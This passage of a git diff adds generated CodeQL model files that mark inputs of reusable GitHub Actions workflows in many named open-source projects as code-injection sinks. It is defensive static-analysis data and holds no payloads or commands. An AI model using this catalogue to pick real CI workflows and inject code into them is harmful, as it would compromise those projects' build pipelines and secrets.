--- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 00000000000..43f5349bf3c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 00000000000..d6ef60a9698 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 00000000000..1d41854bf71 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 00000000000..9f64a59aead --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 00000000000..69cb39e5e55 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 00000000000..a66e2a2cca5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] + - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 00000000000..ca3eeca8df7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 00000000000..b95ce03ed3a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 00000000000..326d4391ecb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 00000000000..849a531cd7b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 00000000000..835bbf4cf89 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 00000000000..453c3cd06f3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 00000000000..32e6124c06e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 00000000000..09177714b08 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 00000000000..78243b4c6d7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 00000000000..6e69fb89fc8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 00000000000..fee19d65a09 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 00000000000..51b58ab74f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 00000000000..5a53b788312 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 00000000000..579e295213b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 00000000000..bc8133b907c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 00000000000..232c6abb3f3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml 
@@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 00000000000..8a7d3c60c45 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 00000000000..a1e523d92ce --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 00000000000..22729c980de --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 00000000000..e242d38bdbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 00000000000..f9c6658f5b8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 00000000000..798c6bcc37a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 00000000000..687db46824a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 00000000000..8a13569af7c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 00000000000..453eb862b94 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 00000000000..37074688f17 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 00000000000..2e1835cadca --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 00000000000..924f5eb157c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 00000000000..1244f76cbf1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 00000000000..94c6c81d33e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ 